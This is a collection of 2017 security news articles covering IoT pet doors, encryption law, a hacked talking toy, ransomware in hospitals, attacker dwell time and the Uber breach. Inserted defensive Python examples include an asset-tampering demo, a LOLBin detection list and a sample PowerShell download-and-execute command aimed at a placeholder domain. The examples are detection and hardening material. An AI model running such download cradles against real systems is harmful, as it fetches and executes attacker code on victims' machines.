STE WILLIAMS

Meow! Facial recognition reaches pet doors

Microsoft has built a facial recognition pet door that uses a webcam, a passive infrared motion sensor, servo motors, and OpenCV facial recognition on a Minnowboard Max – an open-source, single-board computer – running Windows IoT Core in order to let your cat into the house while barring criminals from the family Rodentia.

As Microsoft shows in the video it posted onto its official Windows YouTube channel on Tuesday, when your pet walks up to the door, it triggers a motion sensor, activating a mounted webcam that captures a few frames of the animal’s face. An OpenCV classifier then either grants or denies access to the animal seeking entry.

OpenCV classifiers are trained on sets of similar images. For example, a YouTube tutorial embedded in the original article trains a classifier for car detection from a library of car images.

Of course, facial recognition has a long history of being tricked. A recognizer that decides on what a single frame looks like can be fooled by holding a 2D printout of the target up to the camera, and there is a plethora of cat photos online, many with latitude and longitude coordinates still embedded in their metadata.

Sentient hacker racoons with opposable thumbs, or gremlins small enough to fit through cat flaps, could theoretically find a nearby cat’s photo fairly easily and use it to spoof the biometric entry.

But even moving photos are spoofable. Google at one point filed a patent for “Liveness Checks,” but researchers using the most basic of photo editing tools managed to fool the Liveness Check with just a few minutes of editing and animating photos to make them look like subjects were fluttering their eyelashes.

Animating twitching whiskers would be just as easy.

In August 2016, researchers also managed to use a handful of publicly available photos collected on sites such as Facebook to create 3D facial models that fooled facial recognition systems.

Microsoft claims that its facial recognition cat flap takes only a few seconds to recognize or reject an animal, promising a “seamless approach” that won’t confuse pets.

The company has provided a guide for those who’d like to make their own automated pet door with Windows 10 IoT Core, which is a version of Windows 10 that’s optimized for smaller devices. Microsoft estimates that it takes about 10 hours on average – a potentially “fun project over the holidays” – to create your own cat biometric flap.

Security is, of course, a sore spot in the Internet of Things (IoT) space. Microsoft says Windows 10 IoT Core provides security features intended to resist network attacks on, and physical tampering with, whatever device it runs on. Those are platform features; they don’t secure a weekend project by themselves, and the door decision in front of them is only as good as the classifier and whatever liveness check sits behind it.

It doesn’t hurt to be extra careful when it comes to the security of IoT gadgets, however. So before you start on the cat flap, you might also want to take a look at our tips on securing the IoT.

Because really. Squirrels?

Say no more.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/N0b7G95ZaWo/

US gov says it can break your encryption without a court order

Remember all that drama over encryption, with the FBI wrestling in court with Apple over its inability to access an iPhone belonging to one of the San Bernardino terrorists? And the way that the FBI, even after it paid somebody to crack that iPhone, keeps arguing that strong encryption is allowing major swaths of the criminal and terrorist underworld to “go dark”?

It’s all octopus ink, if you go by what the government says: it doesn’t need approval from its secret surveillance court to ask a tech company to create an encryption backdoor. It already has the legal authority to compel cooperation, it stated in Congressional testimony released over the weekend.

According to ZDNet’s Zack Whittaker, the remarks were made in July in response to questions posed by Sen. Ron Wyden (D-OR), but they were only made public this weekend.

Intelligence officials from the FBI, the National Security Agency (NSA), and the Director of National Intelligence (DNI) told the Senate Intelligence Committee on 7 June 2017 that they can resort to an order from the Foreign Intelligence Surveillance Court (FISC) compelling tech companies to help them out if need be. But they don’t even have to go that far (and had not, as of the date of the hearing), given that they can use FISA to authorize government personnel to compel compliance without the FISC even being given a heads-up about the matter.

ZDNet says the intelligence officials declined to tell the committee whether they’d ever asked a company to add an encryption backdoor.

As ZDNet points out, the government relies on Section 702 of Title VII of the Foreign Intelligence Surveillance Act (FISA) to carry out the bulk of its intelligence gathering and surveillance operations.

That’s not the legislation the FBI relied on in its attempts to get Apple to unlock either the San Bernardino terrorist’s iPhone or that of an alleged meth dealer in Brooklyn. Rather, in those cases, the government relied on a broad interpretation of a law known as the All Writs Act.

The All Writs Act, which hails from 1789, allows courts to issue writs (orders) “necessary or appropriate in aid of their respective jurisdictions and agreeable to the usages and principles of law.”

During the June testimony before Congress, intelligence officials strenuously defended Section 702, saying that it had provided valuable intelligence in multiple cases.

Their support is timely: the legislation is up for renewal, reform or expiration by year’s end, in a few weeks.

The news that the legislation OKs the government’s compelling of encryption breakage without seeking a court order likely isn’t consequential. As it is, the court in question – the FISC – basically just rubber stamps the government’s surveillance requests, keeping its proceedings secret and almost never pushing back against the requests, as NPR has reported.

ZDNet cited a blog post by Marcy Wheeler, an independent journalist who focuses on national security, who last month dissected a FISA reform bill proposed by Wyden.

Wheeler explained that Wyden is concerned that Section 702 “leaves in place current statutory authority to compel companies to provide assistance, potentially opening the door to government mandated de-encryption without FISA Court oversight.”

Translation: the government can use the legislation to force a company such as Apple to back-door its encryption.

Yup, that’s exactly what he’s concerned about, Wyden confirmed in a statement on the bill.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/f7Gt7CXXtOo/

Toucan play that game: Talking toy bird hacked

The same researchers whose hack on the My Friend Cayla doll prompted regulatory action have followed up with a hack on a talking toy robot bird.


Researchers from UK security consultancy Pen Test Partners found that it was child’s play to turn the Teksta Toucan talking toy into a potty-mouth. In homage to The Fast Show, the Toucan was induced to swear like Unlucky Alf’s parrot, as a video in the original article illustrates.

“We knew that the Toucan had much in common with My Friend Cayla and iQue, so had a go at the same attacks,” explained Pen Test Partners’ Ken Munro.

El Reg understands that Toucan is manufactured by the same vendor that makes iQue and Cayla, Genesis Industries Ltd of Hong Kong, and we have asked it for comment.

Two hack methods were quickly uncovered. Firstly, the Toucan is a Bluetooth audio device. It has a microphone and speaker, so it’s possible to simply pair it to a Bluetooth audio device (laptop, phone etc) and play some audio through the Toucan.

The Toucan works slightly differently from Cayla: its audio files are .mp3s packed inside an OBB, the expansion file that ships alongside the Android app. The second, slightly trickier hack extracts the Android package, as PTP did with Cayla, and swaps an mp3 for a sweary one of your choice; nothing in the app checks that the audio it plays is the audio the vendor shipped.
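The asset swap works because the app plays whatever is in the OBB without checking where it came from. As an added example (this is not PTP’s tooling or the toy’s own code), here is the kind of check the app could make before playback: a manifest of SHA-256 hashes of the assets, authenticated with an HMAC over the manifest, verified before any file is played. Everything in it is constructed: the asset bytes, the file names and the key. A symmetric key has to live inside the APK, so this only defeats the OBB swap, not an attacker who also patches the app, and it does nothing against the Bluetooth pairing route; a vendor signature with the private key kept off the device would be the stronger form.

```python
import hashlib
import hmac
import io
import json
import zipfile

# Constructed stand-ins for the toy's audio assets. Real OBBs hold full .mp3
# files; these byte strings are placeholders, not the product's files.
ORIGINAL_ASSETS = {
    "audio/hello.mp3": b"ID3\x03\x00\x00\x00\x00\x00\x00 hello-toucan",
    "audio/squawk.mp3": b"ID3\x03\x00\x00\x00\x00\x00\x00 squawk",
}

# Hypothetical key. A symmetric key must ship inside the app to verify, so this
# only stops an attacker who edits the OBB without also patching the APK.
SIGNING_KEY = b"replace-with-vendor-key-material"


def _manifest_bytes(hashes):
    # Canonical encoding so signer and verifier authenticate identical bytes.
    return json.dumps(hashes, sort_keys=True, separators=(",", ":")).encode()


def build_signed_obb(assets, key):
    """Pack assets into a zip-style OBB with a hash manifest and an HMAC over it."""
    hashes = {name: hashlib.sha256(data).hexdigest() for name, data in assets.items()}
    manifest = _manifest_bytes(hashes)
    sig = hmac.new(key, manifest, hashlib.sha256).hexdigest()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in assets.items():
            zf.writestr(name, data)
        zf.writestr("manifest.json", manifest)
        zf.writestr("manifest.sig", sig)
    return buf.getvalue()


def verify_obb(obb_bytes, key):
    """Return {asset name: bytes} only if the manifest HMAC and every hash check out."""
    with zipfile.ZipFile(io.BytesIO(obb_bytes)) as zf:
        names = set(zf.namelist())
        if "manifest.json" not in names or "manifest.sig" not in names:
            raise ValueError("unsigned OBB")
        manifest = zf.read("manifest.json")
        expected_sig = hmac.new(key, manifest, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected_sig, zf.read("manifest.sig").decode()):
            raise ValueError("manifest signature mismatch")
        hashes = json.loads(manifest)
        # Reject extra files too: an added asset could be played later by name.
        if set(hashes) != names - {"manifest.json", "manifest.sig"}:
            raise ValueError("asset list does not match manifest")
        verified = {}
        for name, digest in hashes.items():
            data = zf.read(name)
            if not hmac.compare_digest(hashlib.sha256(data).hexdigest(), digest):
                raise ValueError(f"hash mismatch for {name}")
            verified[name] = data
    return verified


def replace_asset(obb_bytes, name, new_data):
    """The attack from the article: rewrite one asset, leaving everything else intact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(obb_bytes)) as src, \
            zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as dst:
        for item in src.infolist():
            data = new_data if item.filename == name else src.read(item.filename)
            dst.writestr(item.filename, data)
    return buf.getvalue()


def asset_is_trusted(obb_bytes, name, key=SIGNING_KEY):
    """Playback gate: True only when the named asset survives verification."""
    try:
        return name in verify_obb(obb_bytes, key)
    except ValueError:
        return False
```

The gate is all-or-nothing on purpose: a manifest that checks out but lists a different set of files than the package holds is treated as tampering, since the app might play an added file by name.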

The iQue smart robot and Cayla were banned by the German telecommunications regulator a few months back. French regulators acted against Cayla earlier this week.

“Of more concern is that one can use the microphone too. Yes, just like Cayla, a third party can snoop on your kids and your house,” Munro said. “We are in the process of reporting this to the German telecommunications regulator in the hope of another ban being issued.”


Munro advised parents not to buy the toys and said, if they had one already, they should take it back to the shop.

In a barbed remark to manufacturers, Munro concludes that if vendors took the trouble to take even the most basic security steps towards securing smart toys then this sort of attack wouldn’t be possible. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/12/07/robot_bird_teksa_toucan_hack/

HMS Queen Lizzie formally joins the Royal Navy

Britain’s biggest ever aircraft carrier, HMS Queen Elizabeth, has been formally commissioned into the Royal Navy, with Her Majesty attending the ceremony in person.

The ceremony, held this morning at Portsmouth Naval Base inside the carrier’s own hangar, saw Queen Elizabeth II address dignitaries and others before the ship’s commanding officer, Captain Jerry Kyd RN, read the commissioning warrant, formally welcoming the vessel into the fleet.

Prior to today, the ship officially belonged to her builders, the Aircraft Carrier Alliance. The ACA still owns the second carrier, HMS Prince of Wales, which is due for delivery to the navy in a couple of years’ time.

HMS Queen Elizabeth on her first sortie out of Rosyth, 26 June 2017. Crown copyright


“Our new aircraft carrier is the epitome of British design and dexterity, at the core of our efforts to build an Armed Forces fit for the future,” said Defence Secretary Gavin Williamson in the inevitable canned quote.

“The Queen Elizabeth-class carriers will sit at the heart of a modernised and emboldened Royal Navy, capable of projecting power and influence at sea, in the air, over the land and in cyberspace, and offering our nation military and political choice in an uncertain world,” added the First Sea Lord, Admiral Sir Philip Jones.

The new carrier was commissioned on the same date as the infamous Japanese attack on Pearl Harbour, as well as the date when the last British carrier, HMS Illustrious, was towed to Turkey to be torn apart.

The warship has attracted much public comment and controversy over her £3.5bn price tag. Informed folk were horrified when the ship appeared to be running Windows XP in her flying control room, though the MoD has assured the public that the ship won’t be running XP once she’s “operational”.

In summer this year, a cheeky Scottish drone photographer scored a notable first, being the first to land a flying machine on the carrier.

Though serious questions remain about the carrier’s role in an ever-shrinking Royal Navy, with stagnant defence budgets and too few warships both to safely escort the carrier in hostile waters and to perform all of the Navy’s other tasks, today is a proud day in British naval history.

After finishing her sea trials, “Big Liz”, as her crew affectionately call the aircraft carrier, will sail to the US in 2018 for initial flight trials with her F-35Bs. Some British-leased F-35Bs will be flown to Britain next year, where they will be based at RAF Marham. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/12/07/hms_queen_elizabeth_commissioned/

Why Third-Party Security is your Security


Managing third-party risk isn’t just a good idea, in many cases, it’s the law. This security framework can help you minimize the threat.

Depending on third parties is inescapable. Every organization needs software, hardware, Internet connectivity, power, and buildings. It’s unlikely they’re going to do all those things themselves. That means that organizations must be dependent on others outside themselves. With that dependence comes risk.

F5 recently partnered with Ponemon Institute to survey CISOs. In the report, The Evolving Role of CISOs and their Importance to the Business, CISOs were asked: Are your organization’s business partners, vendors, and other third parties held to high security standards? The responses:

  • Always — 22%
  • Yes, most of the time – 21%
  • Yes, some of the time – 29%
  • No – 28%

While 54% of the same survey respondents say they monitor third parties to ensure continued compliance with contractually required security requirements, only 21% say they hold third parties to a high security standard. Yet, interestingly, Beazley Insurance, in its breach insights blog from July 2017, reports that third-party suppliers account for 30% of breaches overall.

So, 28% of CISOs are ignoring 30% of their risk?

As my kids would say, “Seriously?”

To get some perspective, let’s look back at these serious security incidents from the past few years that involved third-party vendors:

  • From August 2016 until March 2017, Sabre’s central reservation system, SynXis, which was being used by 100,000 hotels and more than 70 airlines, was hacked and users’ personal data accessed. Thousands of companies that used Sabre’s reservation system had to send out breach notices to their respective customers.
  • In 2016, a compromise of “an unnamed third party” with remote access into Wendy’s point-of-sale system resulted in malware infecting over a thousand Wendy’s locations that stole customer payment card data.
  • Hackers had access to an Experian server from 2013 until 2015, which provided them access to the credit check records of 15 million T-Mobile customers.
  • The big story in third-party security is still Target. In 2013, cyber-crooks got in via an HVAC vendor and accessed data on 70 million customers. So far this has cost Target $202 million to clean up.

Who Are Third Parties?

  • Any vendor, customer or partner whose security failure can lead to a security failure of any of your critical assets or systems
  • Partners with direct access to your critical systems like building management firms, co-location facility providers, IT contractors, and off-site backup services
  • Partners of critical dependencies such as Internet service providers, managed IT services vendors, and major software vendors
  • Customers, business partners, and sub-tenants if they have network or physical access to your environment
  • In many hospitals, the internal clinics and medical service facilities are run by different organizations from the encompassing hospital, yet they often share the same network, creating a patchwork of third-party security environments

Compliance Requirements on Third Parties
Managing third-party risk isn’t just a good idea; in many cases, it’s the law. Your organization is required to impose, by contract, security and privacy obligations on third parties that access sensitive data if you:

  • Process personal data on EU citizens, per GDPR Article 28
  • Collect, access, or process protected health information, per the HIPAA Privacy and Security Rules
  • Collect or process payment card data, per PCI DSS
  • Are a bank or other financial institution regulated by the New York State Department of Financial Services (23 NYCRR 500)

These are only the regulations that spell out third-party requirements directly; many others, such as those covering US banks and publicly traded companies, call for third-party security oversight without detailing what it must include.

Third-Party Controls
What to do about controls? Let’s learn from our fellow CISOs, per the same F5 and Ponemon report. To start, you will need to establish a third-party security policy. This policy should always begin with a statement that  communicates to the entire organization (and regulators) what your official stance is regarding a particular risk. In this case, you need a policy that says that your organization recognizes risk from third parties and will measure and control it to an acceptable level. Here’s how the surveyed CISOs defined the baseline:

  • 46% — Establish objective security requirements or protocols for third parties
  • 34% — Establish security requirements and controls for cloud providers
  • 33% — Establish security procedures to ensure that the supply chain is not corrupted, contaminated, or disruptive to business
  • 27% — Establish a direct communication channel between security and contracts/procurement

Set a Standard for Evaluating Third-Party Security
Now that you have a policy, which is a general statement, you need to bolster it with some details. This third-party standard establishes the baseline that third parties must meet, so communicate it to them before you have to rely on them. The standard also serves as the benchmark that your organization will use to measure third-party security. According to the survey, 57% of respondents suggest establishing a process for evaluating the security protection capability of third parties before engaging in business activities, while 52% recommend establishing a vetting process to ensure all third parties are evaluated and screened against objective security requirements.

Monitor Third-Party Security
With a policy and standard in place, now you can set up on-going processes to do that measuring and feedback. Survey results show that 54% of respondents monitor third parties to ensure continued compliance with contractually required security requirements while 44% say they periodically review third parties to objective security requirements.

Enforce Violations from Standard
It’s one thing to set policies and measure against standards, but you need to do something with those results or it’s all a waste of time. According to the survey:

  • 53% of respondents ensure compliance through third-party contracts that contain security, privacy, and responsibility/liability requirements in case of a breach
  • 37% of respondents establish enforcement actions and termination penalties against third parties that fail to comply with security requirements
  • 25% of respondents establish remediation procedures for third parties that fail to comply with security requirements

Hopefully we’ve spelled out the specifics you need to put together a complete third-party security framework for your organization. Note where your peers are going and make it happen.


Raymond Pompon is a Principal Threat Researcher Evangelist with F5 Labs. With over 20 years of experience in Internet security, he has worked closely with Federal law enforcement in cyber-crime investigations. He has recently written IT Security Risk Control Management: An …

Article source: https://www.darkreading.com/partner-perspectives/f5/why-third-party-security-is-your-security/a/d-id/1330552?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Attacker ‘Dwell Time’ Average Dips Slightly to 86 Days

Real-world incident response investigation data from CrowdStrike reveals attacker trends with fileless malware, ransomware, and other weapons.

It now takes an organization just under three months on average to detect hackers embedded in their network, a modest improvement over years past.

That’s one of the takeaways from data culled from 100 incident response investigations conducted by CrowdStrike this year. The security firm’s newly published Cyber Intrusion Services Casebook 2017 shows that organizations are getting a bit better at sniffing out attackers hiding out in their network over the previous two years, when the average so-called dwell time by an attacker was more than 100 days.

“Dwell time continues to be a problem. There’s a lot an adversary can do in 86 days,” says Bryan York, director of services for CrowdStrike. “It’s an improvement, but it’s still too long.”

York says organizations are gradually getting more visibility into activity in their networks, and that the security industry overall is doing a better job at integrating their different products via application programming interfaces. There also are better tools for correlating security data that speeds up response time, he notes, all of which help with detecting malicious activity.

CrowdStrike also saw an 11% increase in the number of cases where the victims spotted their own breach first, and didn’t have to hear it from the feds or a third party.

The longer a hacker remains inside a target’s network, the more damage he or she can do to steal information or disrupt the victim’s business. CrowdStrike’s team in its IR investigations also saw some shockingly long dwell times of 800 to 1,000 days in some cases, but those were “outliers,” according to CrowdStrike.

Meanwhile, most of the cases involved malware-free (so-called fileless) attacks: in 66% of them the intruders relied on camouflaged, living-off-the-land techniques, driving legitimate Windows components for their own ends rather than dropping a conventional malicious executable. Attackers employed stolen credentials, code that ran only in memory, Remote Desktop Protocol, WMI, PowerShell, and stolen virtual private network credentials, for example.

“These [attacks] are increasing in sophistication,” York says.

The most common initial attack vectors CrowdStrike saw in its client investigations were exploits against a Web server, Web application, and Web shells and file uploaders, 37%;  remote access (such as RDP, VPN), 23%; supply chain compromise, 12%; social engineering, phishing, or spear phishing, 11%; cloud-based service exploits, attacks against email portals, or other unauthorized access, 11%; and reconnaissance or other methods, 6%.
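The malware-free techniques in the paragraph above (WMI, PowerShell, stolen credentials) leave no file to scan, but they do leave process-creation telemetry. As an added example that is not part of CrowdStrike’s casebook or tooling, here are two detection rules run over constructed, simplified renderings of Windows Security event 4688 (process creation with command-line auditing on): a script host or LOLBin spawned by the WMI provider host, and a PowerShell invocation carrying an encoded command, which the rule decodes so the analyst sees the script rather than a Base64 blob. Host names, paths, the sample command line and the timestamps are all made up; the dwell-time helper at the end just measures the gap between the earliest alert and the moment the intrusion was finally noticed, the number the article is about.

```python
import base64
import binascii
import re
from datetime import datetime

# Constructed sample: the "payload" is a harmless download-cradle-shaped string
# pointing at a reserved .invalid domain; it is never executed here.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Constructed, simplified 4688-style lines. Not real telemetry.
SAMPLE_EVENTS = [
    '2017-11-02T03:14:07Z host=WS042 parent=C:\\Windows\\explorer.exe '
    'image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe notes.txt"',
    '2017-11-02T03:15:22Z host=WS042 parent=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe '
    'image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c whoami /all"',
    '2017-11-02T03:16:01Z host=WS042 parent=C:\\Windows\\System32\\cmd.exe '
    'image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'cmdline="powershell.exe -NoP -W Hidden -enc {ENCODED}"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Interpreters and LOLBins the WMI provider host should not be launching on a workstation.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def parse_event(line):
    """Split 'timestamp key=value key="quoted value" ...' into a dict."""
    ts, rest = line.split(" ", 1)
    fields = {k: quoted or bare for k, quoted, bare in FIELD_RE.findall(rest)}
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if there is none.

    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...);
    the argument is Base64 of the UTF-16LE script text.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        switch = tok.lower().lstrip("-/")
        if tok[0] in "-/" and switch and "encodedcommand".startswith(switch):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def detect(events):
    """Apply the two living-off-the-land rules; alerts come back in event order."""
    alerts = []
    for ev in events:
        parent, image = basename(ev["parent"]), basename(ev["image"])
        if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
            alerts.append({"ts": ev["ts"], "host": ev["host"],
                           "rule": "wmi-spawned-shell", "detail": ev["cmdline"]})
        if image == "powershell.exe":
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                alerts.append({"ts": ev["ts"], "host": ev["host"],
                               "rule": "powershell-encoded-command", "detail": decoded})
    return alerts


def dwell_days(alerts, detected_at):
    """Whole days between the earliest alert (first evidence) and when the intrusion was noticed."""
    first = min(a["ts"] for a in alerts)
    return (datetime.strptime(detected_at, "%Y-%m-%dT%H:%M:%SZ") - first).days
```

Both rules are deliberately narrow: WmiPrvSE.exe spawning a shell is rare enough on workstations to be worth a ticket, and decoding the command at detection time is what turns an opaque alert into something an analyst can triage in seconds.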

Wormables

But the new twist in 2017 attacks (think WannaCry and NotPetya) was self-spreading or self-propagating malware, a sort of new generation of the old network worm. Some of CrowdStrike’s clients suffered ransomware or other malware infections via this method, especially if they hadn’t kept their systems updated with the latest patches.

“We observed quite a few” of these types of attacks, York says. “A single system got infected with ransomware, and there was more propagation across the environment without any user interaction, or phishing,” etc., he says.

Much of the surge was courtesy of the leaked NSA exploits EternalBlue and EternalRomance, which target flaws in Microsoft’s SMBv1 implementation (fixed by the MS17-010 update in March 2017, two months before WannaCry) to spread malware from host to host inside a network. The attackers behind WannaCry and NotPetya didn’t hesitate to weaponise those tools to spread their ransomware; unpatched hosts with SMBv1 reachable on port 445 are what made them wormable.

Much of the goal with these attacks has been destruction rather than ransom income, notes York. “We were involved with several companies whose businesses were halted because of those attacks,” he says.

“We really see destruction as a gamechanger moving forward.”


Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/attacks-breaches/attacker-dwell-time-average-dips-slightly-to-86-days/d/d-id/1330580?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Ransomware Meets ‘Grey’s Anatomy’

Fictional Grey Sloan Memorial Hospital is locked out of its electronic medical records, but in the real world, healthcare organizations face even greater risks.

Like many couples, my wife and I enjoy watching TV dramas together. However, the recent winter finale of the long-running Grey’s Anatomy really hit home. It was about how the debilitating effects of a ransomware attack could leave a hospital and its patients at the mercy of attackers.

Natalie, my wife, is a pediatric intensivist (a doctor who works at an intensive care unit for children) and the chief medical information officer at Stanford Children’s Hospital. I am the chief risk officer and chief security officer at Neustar, a company that is responsible for Internet and telecommunication services, as well as solutions that prevent and mitigate the types of attacks depicted in Grey’s Anatomy.

Spoiler Alert!
Can hospitals really be taken offline, leaving critical support systems vulnerable and completely exposed to malicious actors? Or is this typical television hyperbole?

The harsh reality is that the producers of Grey’s Anatomy did their research and delivered a dramatized version of a threat that many kinds of business, healthcare organizations included, have come to know all too well. We saw a real-life example with the WannaCry ransomware outbreak that crippled dozens of UK National Health Service hospitals in May 2017. No one is immune to ransomware, but you can fend it off, defend your critical infrastructure, and prepare for emergencies like this through preventive measures and training.

As a CMIO and CRO/CSO couple, we both immediately thought about the extensive work our organizations undertake to prevent these types of attacks and to mitigate the effects if they happen. Proper patch management is key to preventing known attacks. A solid Web application firewall (WAF) can block many attacks on Internet-facing web applications and buy time while a patch is rolled out, but it is not a substitute for patching: WannaCry spread over SMB file sharing on port 445, traffic a WAF never sees, and only the MS17-010 update (or disabling SMBv1) closed that hole.

But what if this isn’t a known attack, what then? Business continuity management and disaster recovery are needed in that instance. Hospitals (and anyone running an IT system) should have backups and test restoring from them regularly; a backup that has never been restored is an assumption, not a recovery plan, and one that ransomware can reach over the network is just another victim. It is absolutely critical that health information technology departments closely monitor all of their critical systems, keep backup copies of key information and systems, and have mitigation plans in place should any of those systems fail for any reason, including a cyberattack. In fact, many hospitals keep complete duplicate copies of their entire electronic medical record system at a location separate from the primary data storage site.
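The restore test is the step most often skipped, and it is also the one that catches a backup that ransomware has already reached. As an added example, not from the authors or their organizations, here is a minimal restore drill: a backup is taken together with a manifest of SHA-256 hashes, the manifest is held out of band (the function returns it rather than trusting a copy on the backup share), a restore into a scratch location is verified file by file, and the same verifier then flags a backup that was altered after it was taken. The patient records, directory names and the simulated encryption are all constructed for the example.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def take_backup(source_dir, backup_dir):
    """Copy the source tree and return a manifest {relative path: sha256}.

    Keep the returned manifest somewhere the backup share cannot be written from
    (a monitoring system, WORM storage). A verifier that reads the manifest off
    the share it is checking trusts exactly the thing ransomware can rewrite.
    """
    source_dir, backup_dir = Path(source_dir), Path(backup_dir)
    shutil.copytree(source_dir, backup_dir)
    return {
        p.relative_to(backup_dir).as_posix(): sha256_file(p)
        for p in sorted(backup_dir.rglob("*")) if p.is_file()
    }


def verify_backup(backup_dir, manifest):
    """Recompute every hash against the out-of-band manifest.

    Returns (ok, problems); problems lists files missing, altered, or not in the manifest.
    """
    backup_dir = Path(backup_dir)
    problems = []
    present = {p.relative_to(backup_dir).as_posix() for p in backup_dir.rglob("*") if p.is_file()}
    for rel, digest in manifest.items():
        path = backup_dir / rel
        if not path.is_file():
            problems.append(f"missing: {rel}")
        elif sha256_file(path) != digest:
            problems.append(f"altered: {rel}")
    for rel in sorted(present - set(manifest)):
        problems.append(f"unexpected: {rel}")
    return (not problems), problems


def restore_drill(backup_dir, manifest, restore_dir):
    """Restore into a scratch location and verify the restored copy, not the backup itself."""
    shutil.copytree(backup_dir, restore_dir)
    return verify_backup(restore_dir, manifest)


def demo():
    """Constructed scenario: back up two records, run the drill, then let
    'ransomware' reach the backup share and check that the verifier notices.
    Returns (drill_ok, backup_ok_afterwards, problems)."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        src = tmp / "emr"
        (src / "records").mkdir(parents=True)
        (src / "records" / "patient-0001.json").write_text('{"id": 1, "allergies": ["penicillin"]}')
        (src / "records" / "patient-0002.json").write_text('{"id": 2, "allergies": []}')
        manifest = take_backup(src, tmp / "backup")
        drill_ok, _ = restore_drill(tmp / "backup", manifest, tmp / "restore")
        # Simulate ransomware reaching the backup share after the backup was taken:
        # one record overwritten, one ransom note dropped beside it.
        (tmp / "backup" / "records" / "patient-0001.json").write_bytes(b"\x00encrypted\x00")
        (tmp / "backup" / "records" / "patient-0001.json.locked").write_bytes(b"ransom note")
        ok, problems = verify_backup(tmp / "backup", manifest)
        return drill_ok, ok, problems
```

Run demo() to see the drill pass and the tampered backup fail. The point of the design is the separation: the manifest travels with the monitoring side, the drill restores to scratch storage rather than reading the share in place, and an unexpected file is reported as loudly as an altered one.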

As we saw on television, Grey Sloan Memorial Hospital was locked out of its electronic medical records. It could just as easily have been hit with a distributed denial-of-service (DDoS) attack. We have seen ever larger DDoS attacks since Mirai began conscripting compromised Internet of Things devices into botnets. A hospital should have DDoS mitigation in place, a secondary DNS provider should its primary be attacked, and critical clinical systems that keep working when Internet access is lost.

How Should a Hospital Respond in Real Life?
While Grey’s Anatomy was significantly overdramatized, this type of crisis can and does happen (as in the UK hospitals hit by the WannaCry attack). A cyberattack is an emergency that hospitals need to be prepared for as much as they are for any other type of emergency, such as natural disasters and mass casualties. Our healthcare information systems have become tightly integrated into patient care, so — just as on Grey’s Anatomy — younger physicians and staff members may not remember a time when they had to deliver care without these systems.

How does a health system prepare and respond? Planning, training, and practice. A hospital’s office of emergency management works closely with the IT department to ensure that it is prepared for exactly these types of emergencies. Alternative workflows must be identified ahead of time. Staff members must be routinely trained on how to use the downtime systems. Regular, planned system downtimes can be used for training, practice, and testing of the downtime systems. In severe emergencies, prioritization schemas should be used to ensure that critical resources are going to the most appropriate patients and that patients are diverted to other facilities when necessary.

We all love a good television drama to get our minds off of work and the stress of our everyday lives. However, Grey’s Anatomy is a stark reminder of the critical roles we play in our organizations and how important it is for everyone to prepare for the worst, so that we can be at our best if and when it happens.


Tom serves as the CRO and CSO at Neustar, Inc. Prior to this role, he served as chief risk officer and chief information security officer at DocuSign. While at JPMorgan Chase, Tom served as the deputy CISO, where he led cybersecurity, fraud prevention, and protective …

Article source: https://www.darkreading.com/risk/ransomware-meets-greys-anatomy/a/d-id/1330559?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Uber Used $100K Bug Bounty to Pay, Silence Florida Hacker: Report

Uber reportedly paid a 20-year-old Florida man behind its massive data breach $100,000 from its bug bounty program to keep mum about the cyberattack and to delete the stolen data.

A Reuters report quotes unnamed sources familiar with the breach event as saying that Uber paid the man in order to confirm his identity, and had him sign a nondisclosure agreement to prevent him from doing any further damage. Uber also performed a forensic investigation on the man’s computer to ensure he had deleted the stolen information.

The man reportedly paid another individual to steal Uber credentials from GitHub, which ultimately led to the Uber systems breach. According to a source quoted in the Reuters report, the man was “living with his mom in a small home trying to help pay the bills.”

Uber’s use of a bug bounty for the payment was an unusual move: bug bounty payments normally range from $5,000 to $10,000.


 


Article source: https://www.darkreading.com/attacks-breaches/uber-used-$100k-bug-bounty-to-pay-silence-florida-hacker-report/d/d-id/1330584?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

NiceHash diced up by hackers, thousands of Bitcoin pilfered

Cryptocurrency mining market NiceHash says it has fallen victim to a hacking attack that may have resulted in the loss of its entire Bitcoin wallet.

